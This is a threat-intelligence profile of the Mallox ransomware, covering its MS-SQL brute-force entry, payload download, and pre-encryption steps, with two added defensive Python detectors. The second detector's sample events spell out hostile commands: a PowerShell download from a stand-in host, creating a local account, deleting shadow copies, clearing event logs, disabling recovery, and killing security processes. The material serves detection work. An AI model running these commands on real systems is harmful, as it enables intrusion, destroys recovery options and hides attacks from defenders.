Mallox (TargetCompany) – Malware

July 22, 2024
in Malware
Mallox

Type of Malware

Ransomware

Country of Origin

Unknown

Date of initial activity

2021

Associated Groups

TargetCompany

Motivation

Financial Gain

Attack Vectors

The group gains its initial foothold through Internet-exposed MS-SQL servers with weak credentials, which it brute-forces with a password dictionary.

Tools

Cryptographic primitives used by the encryptor: ChaCha20, AES-128, Curve25519. Observed attacker tooling: password brute-forcing and network scanners.

Targeted System

Windows

Overview

Mallox is a ransomware strain that targets Microsoft Windows systems. Active since June 2021, it is notable for using unsecured MS-SQL servers as its initial-access vector into victims' networks.

Increase in Activity

In 2023, Unit 42 researchers observed a significant uptick in Mallox ransomware activity, an increase of almost 174% over the previous year. The attackers continued to exploit MS-SQL servers to distribute the ransomware. Unit 42 incident responders noted that Mallox operations involve brute forcing, data exfiltration, and tools such as network scanners.

Encryption Techniques

The ransomware combines several cryptographic primitives: ChaCha20, AES-128, and Curve25519. Avast released a free decryptor on February 7, 2022. It was built against the variants circulating at that time and should not be assumed to work on later builds, so a recovery plan cannot rely on it.

Targets

Worldwide victims, across multiple industries, including manufacturing, professional and legal services, and wholesale and retail.

How they operate

Initial Access

Since its emergence in 2021, the Mallox group has consistently targeted unsecured MS-SQL servers to infiltrate networks. These attacks begin with a dictionary brute-force attack: a list of known or commonly used passwords is tried against the MS-SQL server's logins until one succeeds.

Attack Execution

After gaining access, the attackers use the command line and PowerShell to download the Mallox ransomware payload from a remote server. The command line performs the following actions:

  • Downloads the ransomware payload from hxxp://80.66.75[.]36/aRX.exe and saves it as tzt.exe.
  • Runs a PowerShell script named updt.ps1.

The PowerShell script then performs the following actions:

  • Downloads another file named system.bat and saves it as tzt.bat. This batch file creates a local user named SystemHelp and enables Remote Desktop (RDP), giving the attackers an interactive foothold that does not depend on the original SQL session.
  • Executes the ransomware payload tzt.exe through Windows Management Instrumentation (WMI).
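The dictionary attack described above leaves a dense trail in SQL Server's ERRORLOG: every rejected login produces a "Login failed" line (error 18456) that carries the caller's address. The script below is an added example, not Mallox tooling and not code from the cited reports. It parses ERRORLOG lines and flags any client address that reaches five or more failures inside a 60-second sliding window. The sample log lines, client addresses, account names and the threshold are all constructed for the demonstration.

```python
"""Flag MS-SQL password guessing from SQL Server ERRORLOG entries.

Added example for this page; not Mallox tooling and not code from the cited
reports. The sample log, client addresses, account names and threshold are
all constructed for the demonstration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# SQL Server writes one "Login failed" line per rejected login (error 18456)
# and appends the caller's address as "[CLIENT: a.b.c.d]".
LOGIN_FAILED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']+)'.*\[CLIENT: (?P<ip>[\d.]+)\]"
)

# Constructed sample: nine guesses against 'sa' in 24 seconds from one
# address (dictionary attack), one non-login line, and two failures hours
# apart from another address (an operator mistyping a password).
SAMPLE_ERRORLOG = "\n".join(
    [
        f"2024-07-22 03:14:{sec:02d}.00 Logon       Login failed for user 'sa'. "
        f"Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]"
        for sec in range(1, 28, 3)
    ]
    + [
        "2024-07-22 03:14:05.00 Logon       Error: 18456, Severity: 14, State: 8.",
        "2024-07-22 08:02:11.00 Logon       Login failed for user 'reports'. "
        "Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]",
        "2024-07-22 09:47:30.00 Logon       Login failed for user 'reports'. "
        "Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]",
    ]
)


def parse_failed_logins(errorlog_text):
    """Return (timestamp, user, client_ip) for each failed-login line."""
    events = []
    for line in errorlog_text.splitlines():
        m = LOGIN_FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events.append((ts, m["user"], m["ip"]))
    return events


def find_password_guessing(events, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: summary} for addresses whose failures reach the
    threshold inside any sliding window of the given length."""
    by_ip = defaultdict(list)
    for ts, user, ip in events:
        by_ip[ip].append((ts, user))

    findings = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        peak, left = 0, 0
        for right in range(len(attempts)):
            # Slide the left edge forward until the window fits.
            while attempts[right][0] - attempts[left][0] > window:
                left += 1
            peak = max(peak, right - left + 1)
        if peak >= threshold:
            findings[ip] = {
                "peak_in_window": peak,
                "users": sorted({user for _, user in attempts}),
                "first": attempts[0][0],
                "last": attempts[-1][0],
            }
    return findings


if __name__ == "__main__":
    for ip, info in find_password_guessing(parse_failed_logins(SAMPLE_ERRORLOG)).items():
        print(f"{ip}: {info['peak_in_window']} failed logins within 60 s "
              f"against {info['users']} between {info['first']} and {info['last']}")
```

The sliding window matters more than a raw count: a real operator mistyping a password twice in a morning never reaches the threshold, while a dictionary run against a single login does so within seconds. On a production server the same logic can be pointed at the output of xp_readerrorlog or at the ERRORLOG file itself.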
Ransomware Execution

Before encryption takes place, the ransomware payload performs several actions to make sure encryption succeeds and recovery fails:

  • Stop and remove SQL-related services: uses sc.exe and net.exe to stop and delete SQL services, releasing the database files so they can be opened and encrypted.
  • Delete volume shadow copies: removes the local restore points so files cannot be rolled back after encryption.
  • Clear event logs: uses Microsoft's wevtutil command-line utility to clear the Application, Security, Setup and System event logs, hindering detection and forensic reconstruction.
  • Modify file permissions: uses the built-in takeown.exe to take ownership of key system binaries as a step toward denying access to cmd.exe and other system processes.
  • Disable System Image Recovery: uses bcdedit.exe to keep an administrator from manually booting into the System Image Recovery feature.
  • Terminate security-related processes: uses taskkill.exe to kill security processes and services, evading endpoint protection.
  • Bypass anti-ransomware products: if the Raccine anti-ransomware tool is present, deletes its registry key so that Raccine no longer intercepts the shadow-copy deletion.
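Every step in the Attack Execution and Ransomware Execution passages above is a process launch with a distinctive command line, which is exactly what Sysmon event 1 or Windows security event 4688 (with command-line auditing enabled) records. The script below is an added example, not Mallox code and not detection content from the cited reports. It runs a small set of command-line rules over a constructed sequence of process-creation events that follows the chain described above, and reports which ATT&CK techniques were touched. The event fields mimic Sysmon's Image, ParentImage and CommandLine; the download URL, the account password and the killed process name are invented; the sqlservr.exe parent check is an assumption about how the SQL session spawns a shell, not something the page states; and the switches in the patterns are common forms rather than Mallox's verbatim commands.

```python
"""Command-line rules for the Mallox post-access and pre-encryption steps.

Added example for this page, not Mallox code and not detection content from
the cited reports. Events, paths, the download URL and the password are
constructed; patterns use common switch forms, not Mallox's exact commands.
"""
import re

# (rule name, ATT&CK technique, regex applied to the lower-cased command line)
RULES = [
    ("download cradle in PowerShell", "T1059.001",
     r"powershell.*(downloadfile|downloadstring|invoke-webrequest|iwr\b|start-bitstransfer)"),
    ("local account created", "T1136.001", r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("RDP enabled through the registry", "T1021.001",
     r"reg(\.exe)?\s+add\b.*fdenytsconnections.*/d\s+0\b"),
    ("process started through WMI", "T1047", r"wmic(\.exe)?\s+.*process\s+call\s+create\b"),
    ("SQL service stopped or removed", "T1489",
     r"\b(sc|net1?)(\.exe)?\s+(stop|delete)\s+\S*(mssql|sql)"),
    ("volume shadow copies deleted", "T1490",
     r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"),
    ("Windows event logs cleared", "T1070.001", r"wevtutil(\.exe)?\s+(cl|clear-log)\b"),
    ("ownership taken on system binaries", "T1222.001", r"takeown(\.exe)?\s+/f\s+\S*\\system32\\"),
    ("recovery environment disabled", "T1490",
     r"bcdedit(\.exe)?\b.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    ("forced process termination", "T1562.001", r"taskkill(\.exe)?\s+.*/f\b.*/im\s+\S+"),
    ("Raccine registry key removed", "T1562.001", r"reg(\.exe)?\s+delete\b.*raccine"),
]
COMPILED = [(name, tech, re.compile(pat)) for name, tech, pat in RULES]
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def match_event(event):
    """Return the (rule name, technique) pairs one process-creation event triggers."""
    cmd = event.get("CommandLine", "").lower()
    hits = [(name, tech) for name, tech, rx in COMPILED if rx.search(cmd)]
    # Assumption, not stated on the page: a shell whose parent is sqlservr.exe
    # is the xp_cmdshell footprint that follows a successful MS-SQL login.
    if basename(event.get("ParentImage", "")) == "sqlservr.exe" and \
            basename(event.get("Image", "")) in SHELLS:
        hits.append(("shell spawned by SQL Server", "T1059"))
    return hits


def triage(events, min_distinct_rules=3):
    """Match every event; return per-event hits, techniques seen and a verdict."""
    per_event = [(i, match_event(e)) for i, e in enumerate(events)]
    rules_hit = {name for _, hits in per_event for name, _ in hits}
    techniques = sorted({tech for _, hits in per_event for _, tech in hits})
    verdict = ("ransomware pre-encryption chain" if len(rules_hit) >= min_distinct_rules
               else "isolated activity")
    return per_event, techniques, verdict


SYS32 = "C:\\Windows\\System32\\"
PAYLOAD = "C:\\ProgramData\\tzt.exe"
SQLSERVR = "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe"

# Constructed Sysmon-style events following the chain in the text; the last
# one is benign admin activity that should match nothing.
SAMPLE_EVENTS = [
    {"Image": SYS32 + "cmd.exe", "ParentImage": SQLSERVR,
     "CommandLine": "cmd.exe /c powershell -ep bypass -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://198.51.100.7/payload.exe','" + PAYLOAD + "')\""},
    {"Image": SYS32 + "net.exe", "ParentImage": SYS32 + "cmd.exe",
     "CommandLine": "net user SystemHelp Passw0rd! /add"},
    {"Image": SYS32 + "reg.exe", "ParentImage": SYS32 + "cmd.exe",
     "CommandLine": "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\""
                    " /v fDenyTSConnections /t REG_DWORD /d 0 /f"},
    {"Image": SYS32 + "wbem\\WMIC.exe", "ParentImage": SYS32 + "cmd.exe",
     "CommandLine": "wmic process call create \"" + PAYLOAD + "\""},
    {"Image": SYS32 + "sc.exe", "ParentImage": PAYLOAD, "CommandLine": "sc stop MSSQLSERVER"},
    {"Image": SYS32 + "vssadmin.exe", "ParentImage": PAYLOAD,
     "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"Image": SYS32 + "wevtutil.exe", "ParentImage": PAYLOAD, "CommandLine": "wevtutil cl Security"},
    {"Image": SYS32 + "bcdedit.exe", "ParentImage": PAYLOAD,
     "CommandLine": "bcdedit /set {default} recoveryenabled No"},
    {"Image": SYS32 + "taskkill.exe", "ParentImage": PAYLOAD,
     "CommandLine": "taskkill /F /IM edr_agent.exe"},  # placeholder process name
    {"Image": SYS32 + "reg.exe", "ParentImage": PAYLOAD,
     "CommandLine": "reg delete HKLM\\SOFTWARE\\Raccine /f"},
    {"Image": SYS32 + "sc.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "sc query spooler"},
]

if __name__ == "__main__":
    per_event, techniques, verdict = triage(SAMPLE_EVENTS)
    for index, hits in per_event:
        for name, tech in hits:
            print(f"event {index}: {name} [{tech}]")
    print("techniques:", ", ".join(techniques))
    print("verdict:", verdict)
```

Any one of these rules fires occasionally on legitimate administration (an operator really does clear a log or stop a SQL instance), which is why the verdict is based on how many distinct rules fire on one host rather than on any single match. The parent-process check is the highest-signal item of the set: sqlservr.exe has no business spawning cmd.exe or powershell.exe on a server where xp_cmdshell is not in deliberate use.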
Ransom Note
Mallox leaves a ransom note in every directory on the victim’s drive. This ransom note explains the infection and provides contact information for the attackers.

MITRE tactics and techniques

Initial Access:
  • Exploit Public-Facing Application (T1190)
  • External Remote Services (T1133)
Execution:
  • Command and Scripting Interpreter (T1059)
  • Command and Scripting Interpreter: PowerShell (T1059.001)
  • Windows Management Instrumentation (T1047)
  • System Services: Service Execution (T1569.002)
Persistence:
  • Create Account: Local Account (T1136.001)
  • Scheduled Task/Job (T1053)
Privilege Escalation:
  • Exploitation for Privilege Escalation (T1068)
Defense Evasion:
  • Obfuscated Files or Information (T1027)
  • Deobfuscate/Decode Files or Information (T1140)
  • Masquerading (T1036)
  • Process Injection (T1055)
  • Indicator Removal: Clear Windows Event Logs (T1070.001)
  • Indicator Removal: Timestomp (T1070.006)
  • Impair Defenses: Disable or Modify Tools (T1562.001)
Credential Access:
  • OS Credential Dumping (T1003)
  • Brute Force: Password Guessing (T1110.001)
Discovery:
  • System Information Discovery (T1082)
  • Query Registry (T1012)
  • File and Directory Discovery (T1083)
Lateral Movement:
  • Remote Services (T1021)
  • Remote Services: SMB/Windows Admin Shares (T1021.002)
Collection:
  • Data from Local System (T1005)
Exfiltration:
  • Data exfiltration is reported, but the sources do not identify the channel used.
Impact:
  • Data Encrypted for Impact (T1486)
  • Inhibit System Recovery (T1490)
  • Service Stop (T1489)
References:
  • Threat Group Assessment: Mallox Ransomware (Palo Alto Networks Unit 42)
  • Analysis of TargetCompany's Attacks Against MS-SQL Servers (Mallox, BlueSky Ransomware) (AhnLab ASEC)
Tags: Avast, Mallox, Malware, Microsoft, MS SQL, PowerShell, Ransomware, TargetCompany, Windows, Worldwide